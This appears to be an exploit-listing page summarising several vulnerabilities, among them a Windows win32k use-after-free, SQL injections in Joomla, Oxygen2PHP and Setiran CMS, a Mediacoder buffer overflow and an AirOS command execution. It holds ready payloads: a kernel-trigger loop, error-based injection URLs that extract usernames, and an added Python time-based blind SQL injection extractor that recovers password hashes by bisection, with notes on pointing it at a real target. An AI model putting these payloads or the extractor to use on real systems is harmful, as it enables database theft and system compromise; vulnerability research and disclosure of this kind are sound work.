Explore all Exploits:

Windows Vista/Server 2008 NtUserCheckAccessForIntegrityLevel Use-after-free Vulnerability

Due to hostility toward security researchers, the most recent example being that of Tavis Ormandy, a number of us from the industry (and some not from the industry) have come together to form MSRC: the Microsoft-Spurned Researcher Collective. MSRC will fully disclose vulnerability information discovered in our free time, free from retaliation against us or any inferred employer.

win32k!NtUserCheckAccessForIntegrityLevel in Vista/Server 2008 calls LockProcessByClientId() on the specified ClientID. When this call fails, the process object's reference count is decremented first by nt!ObfDereferenceObject inside the failing call and then a second time by win32k!NtUserCheckAccessForIntegrityLevel itself, so every failed call removes one reference more than it should. Repeating the call drives the reference count to zero and has the still-in-use process object deleted (use-after-free).

The vulnerability can be triggered with the one-liner below, where 4 is just the PID of PsInitialSystemProcess:

while (1) NtUserCheckAccessForIntegrityLevel(4, 0, NULL);

Since there is no exported stub for this system call, you will have to craft the call manually; sysenter is your friend.
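As an added example that is not part of the advisory and not win32k or ntoskrnl code, the following Python model reproduces the logic described above: a lookup that takes a reference, a lock that fails and releases that reference itself, and a caller that releases it a second time on the failure path. The process table, the `gui` flag that decides whether the lock succeeds, and the starting reference counts are all constructed for the illustration.

```python
"""Constructed model of the double-dereference error path (not kernel code)."""


class ProcessObject:
    """Stand-in for a process object: freed when its refcount reaches zero."""

    def __init__(self, pid, refcount, gui=False):
        self.pid = pid
        self.refcount = refcount   # references the rest of the system holds
        self.gui = gui             # assumption: only GUI processes can be locked
        self.freed = False

    def reference(self):
        """Model of taking a reference (ObReferenceObject)."""
        if self.freed:
            raise RuntimeError(f"use-after-free: reference on freed PID {self.pid}")
        self.refcount += 1

    def dereference(self):
        """Model of nt!ObfDereferenceObject: drop a reference, free at zero."""
        if self.freed:
            raise RuntimeError(f"use-after-free: dereference of freed PID {self.pid}")
        self.refcount -= 1
        if self.refcount == 0:
            self.freed = True


def lock_process_by_client_id(pid, table):
    """Model of LockProcessByClientId. The lookup takes a reference; if the
    lock fails (PID 4, the System process, is not a GUI process in this
    model) the routine drops that reference itself before reporting failure.
    It still hands back the pointer it looked up, which is what lets the
    caller touch the object again. Returns (ok, proc)."""
    proc = table.get(pid)
    if proc is None:
        return False, None
    proc.reference()            # lookup: +1
    if not proc.gui:
        proc.dereference()      # nt!ObfDereferenceObject: -1, balances the lookup
        return False, proc
    return True, proc           # success: the caller owns one reference


def check_access_vulnerable(pid, table):
    """Flawed caller: on failure it dereferences again, so each failed call
    removes one reference the caller never owned."""
    ok, proc = lock_process_by_client_id(pid, table)
    if not ok:
        if proc is not None:
            proc.dereference()  # BUG: second decrement on the failure path
        return False
    proc.dereference()          # balanced: release the lock's reference
    return True


def check_access_fixed(pid, table):
    """Corrected caller: the callee already released its reference on
    failure, so the failure path touches the object no further."""
    ok, proc = lock_process_by_client_id(pid, table)
    if not ok:
        return False
    proc.dereference()
    return True


def calls_until_freed(table, pid, check, max_calls=1000):
    """Repeat the call as the page's one-line loop does and report how many
    calls it took to free the still-referenced object (None if it never was)."""
    for n in range(1, max_calls + 1):
        check(pid, table)
        if table[pid].freed:
            return n
    return None


if __name__ == "__main__":
    system = {4: ProcessObject(4, refcount=3)}
    print("freed after", calls_until_freed(system, 4, check_access_vulnerable), "calls")
```

With three outstanding references, the vulnerable caller frees the object on the third failed call while the rest of the system still holds those references; any later touch raises the model's use-after-free error. The fixed caller leaves the count unchanged no matter how often it is called.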

Application Vulnerability

The application is vulnerable in several sections; in particular, up to version 1389, the Research Plans section contains a form whose email field has no input validation. An attacker can submit a SQL query in the email field, leaving the password field empty, to retrieve the DBMS version.

Joomla Component com_dateconverter SQL Injection Vulnerability

Joomla AD/BS Date Converter is a Joomla component for converting dates between the Gregorian calendar and the Bikram Sambat calendar, which is used in Nepal, India, Bhutan, Sri Lanka, Thailand and elsewhere. An attacker can exploit the vulnerability by appending a SQL payload to the vulnerable parameter in the URL, which can be used to extract sensitive information from the database.

Mediacoder v0.7.3.4682 universal buffer overflow (SEH)

Mediacoder v0.7.3.4682 is vulnerable to a buffer overflow, caused by improper bounds checking of user-supplied data, that overwrites a Structured Exception Handler (SEH) record. An attacker can exploit it by getting the application to open a specially crafted file, resulting in arbitrary code execution in the context of the application.

[0-Day] Oxygen2PHP <= 1.1.3 (forumdisplay.php) Remote Blind SQL Injection Exploit

This is a remote blind SQL injection exploit for Oxygen2PHP <= 1.1.3, discovered and coded by Dante90 and the WaRWolFz Crew. It is written in Perl, using LWP::UserAgent, HTTP::Request::Common, Time::HiRes and IO::Socket. It takes the target user's UID as an argument and recovers that user's password hash one character at a time: for each position it injects a condition that invokes MySQL's BENCHMARK() only when the guessed character is correct, so a noticeably slower response (timed with Time::HiRes) confirms the guess. Each confirmed character is printed before moving on to the next.

Oxygen2PHP <= 1.1.3 (post.php) Remote Blind SQL Injection Exploit

This is a 0-day remote blind SQL injection exploit for Oxygen2PHP <= 1.1.3 via post.php, discovered and coded by Dante90 and the WaRWolFz Crew. It injects through a GET request and extracts a password hash from the database, iterating over the characters of the hash and using a BENCHMARK()-based timing check to decide whether each guessed character is correct.
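Both Oxygen2PHP entries above rely on the same time-based technique. The following is an added example, not the Dante90/WaRWolFz exploit and not Oxygen2PHP code, written in Python rather than Perl so that it runs offline against a constructed stand-in for the vulnerable page. It goes beyond the page's character-by-character loop by bisecting on ASCII() values, which brings the cost per character down from one request per candidate character to about seven. The parameter layout, the IF/BENCHMARK fragment, the column name `password` and the hash value are assumptions.

```python
import re
import time

# Constructed stand-in for the vulnerable page (not Oxygen2PHP code). It pulls
# the injected condition out of the request parameter, evaluates it against a
# made-up password hash the way MySQL would, and burns time the way
# BENCHMARK() does when the condition is true.
FAKE_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"   # constructed: md5("password")
BENCHMARK_DELAY = 0.02   # seconds the simulated BENCHMARK() call takes
THRESHOLD = BENCHMARK_DELAY / 2   # slower than this means the condition held

_COND_RE = re.compile(r"IF\((.*?),BENCHMARK\(")
_LEN_RE = re.compile(r"^LENGTH\(password\)>(\d+)$")
_CHR_RE = re.compile(r"^ASCII\(SUBSTRING\(password,(\d+),1\)\)>(\d+)$")


def fake_target(uid_param: str) -> None:
    """Server side: behave like the injected query would on MySQL."""
    m = _COND_RE.search(uid_param)
    if m is None:
        return
    cond = m.group(1)
    holds = False
    lm = _LEN_RE.match(cond)
    cm = _CHR_RE.match(cond)
    if lm:
        holds = len(FAKE_HASH) > int(lm.group(1))
    elif cm:
        pos, n = int(cm.group(1)), int(cm.group(2))
        ch = FAKE_HASH[pos - 1] if 1 <= pos <= len(FAKE_HASH) else ""
        holds = (ord(ch) if ch else 0) > n   # MySQL: ASCII('') is 0
    if holds:
        time.sleep(BENCHMARK_DELAY)   # stands in for BENCHMARK(5000000,MD5(1))


def ask(cond: str) -> bool:
    """Client side: send one request carrying the condition and decide from
    the round-trip time whether it held. The parameter layout (a numeric UID
    followed by the injected fragment) is an assumption."""
    payload = f"1 AND IF({cond},BENCHMARK(5000000,MD5(1)),0)"
    t0 = time.perf_counter()
    fake_target(payload)
    return time.perf_counter() - t0 > THRESHOLD


def find_value(expr: str, lo: int, hi: int) -> int:
    """Recover the integer value of SQL expression `expr`, known to lie in
    [lo, hi], using only yes/no answers to 'expr > mid' (about log2 requests)."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(f"{expr}>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_password_hash() -> str:
    """Learn the hash length first, then each character by its ASCII value."""
    length = find_value("LENGTH(password)", 0, 64)
    return "".join(
        chr(find_value(f"ASCII(SUBSTRING(password,{pos},1))", 0, 126))
        for pos in range(1, length + 1)
    )


if __name__ == "__main__":
    print(extract_password_hash())
```

Against a real target the only change is replacing `fake_target` with an HTTP request that places the payload in the vulnerable parameter; the timing threshold then has to be calibrated against the target's normal response time, since network jitter is the usual source of wrong characters in this class of exploit.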

Setiran CMS Blind SQL Injection Vulnerability

Setiran CMS is vulnerable to SQL injection through the 'id' parameter in the URL. For example:

http://server/Setiran/index.asp?id=1' and 1=convert(int,(select top 1 username from users))--
http://server/Setiran/?id=522' and 1=convert(int,(select top 1 username from users))--

Although the title calls it blind, these payloads are error-based: the T-SQL convert(int, ...) call applied to a username forces a type-conversion error, and the error message returned by the page discloses the selected value.

Ubiquity Nanostation5 (Air OS) 0day Remote Command Execution

With a non-privileged account, such as a read-only one, an attacker can execute commands on the system through the web application panel. Since the system.cfg file is located in the /tmp/ directory, reading its contents (users, passwords, wireless keys, etc.) is straightforward. The vulnerable function is 'Show AP info', located on the main page of the web panel in the 'Extra Informations' section.
